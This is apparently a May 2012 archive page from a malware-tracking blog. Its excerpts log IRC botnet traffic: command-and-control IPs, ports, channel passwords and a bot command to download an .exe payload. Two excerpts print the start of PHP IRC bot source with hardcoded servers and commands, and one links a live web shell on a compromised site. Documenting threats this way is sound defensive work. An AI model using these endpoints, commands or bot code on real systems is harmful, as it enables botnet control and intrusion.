Month: May 2012

Resolved : [xxxd2.com] To [199.168.140.38] Remote Host Port Number 173.192.224.115 80 199.15.234.7 80 199.168.140.38 7777 PASS Eshuxx NICK n{US|XPa}evkfwgc USER evkfwgc 0 0 :evkfwgc JOIN #eshu Eshuxx PRIVMSG #eshu :[d=”http://www.fotosprivadas.com/chicas/update/Ruco.exe” s=”172032 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 Sample hosting infos: http://whois.domaintools.com/199.168.140.38

Remote Host Port Number 199.15.234.7 80 75.77.40.195 6668 PASS ngrBot PRIVMSG #asiksi# :[DNS]: Blocked “windowsupdate.microsoft.com” NICK n{US|XPa}vxpwwmw USER vxpwwmw 0 0 :vxpwwmw JOIN #asiksi# asdr3ny PRIVMSG #asiksi# :[DNS]: Blocked “www.microsoft.com” PRIVMSG #asiksi# :[DNS]: Blocked “microsoft.com” PRIVMSG #asiksi# :[DNS]: Blocked “update.microsoft.com” Now talking in #asiksi# Topic On: [ #asiksi# ] [ .mod usbi on .mdns www.microsoft.comRead more...

Resolved : [o.ksah4ck.com] To [70.88.160.105] Resolved : [o.ksah4ck.com] To [66.41.211.152] Remote Host Port Number 66.41.211.152 3921 NICK [0]USA|XP-SP2[P]552515 USER [0]USA|XP-SP2[P]552515 “localhost” “o.ksah4ck.com” :Notepad. JOIN #errorz hosting infos: http://whois.domaintools.com/70.88.160.105

Albanian hecker using php bots to flood irc channels ##################################################################### #v1.0 Ultimate phpB. Enjoy ! ! ! ! ! # # # # # # # # Fixed By TiRoNcI_BoY® # # Albhack@msn.com # ##################################################################### <? set_time_limit(0); error_reporting(0); class pBot { ####################### V1.0 CONFIGURATION ######################## var $config = array("server"=>"189.30.30.10", # "port"=>6667, //port do server #Read more...

I found this link http://focori.com.br/images/x.php it was a php shell uploaded to vulnerable site inside i found the bot used for exploiting vulnerable sites <? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the botRead more...

Our anonymous friend pointed this url http://cbteam.ws/(inside u have samples) i checked files and i found this botnet wich i allready posted ip’s in the blog Resolved : [cube.sdeirc.net] To [89.248.166.139] Remote Host Port Number cube.sdeirc.net 7392 PASS none NICK New{US-XP-x86}1124207 USER 1124207 “” “1124207” :1124207 MODE New{US-XP-x86}1124207 +iMmx JOIN #a secret JOIN #rndbot zragRead more...

Got the sample from our anonymous friend and here is what it does 1.downloads file installer.gif GET /installer.gif?action=started&browser=ie6&ver=1_16_149_149&bic=66583225931340E1B463893B68AD2174IE&app=4761&appver=0&verifier=eb9f1208f7e0fabe1db48c4f79a1fbad&srcid=0&subid=0&zdata=0&ff=1&ch=1&default=X&os=XP&admin=1&type=14337 HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: stats.crossrider.com Connection: Keep-Alive Cache-Control: no-cache 2.downloads and install fake chrome The data identified by the following URLs was then requested from the remote web server: http://o-o.preferred.xo-ord1.v9.lscache2.c.pack.google.com/edgedl/chrome/install/1123.1/chrome_installer.exe?cms_redirect=yes http://crt.usertrust.com/AddTrustExternalCARoot.p7c http://app-static.crossrider.com/plugin/apps/4761/plugins/1_16_149_149/ie6/plugins.json?ver=2 http://app-static.crossrider.com/plugin/opensearch/ie/4761.xml http://cotssl.crossrider.com/plugin/apps/4761/manifest/1_16_149_149/ie6/manifest.xml?ver=0 http://crl.verisign.com/pca3.crl http://crl.verisign.com/ThawteTimestampingCA.crlRead more...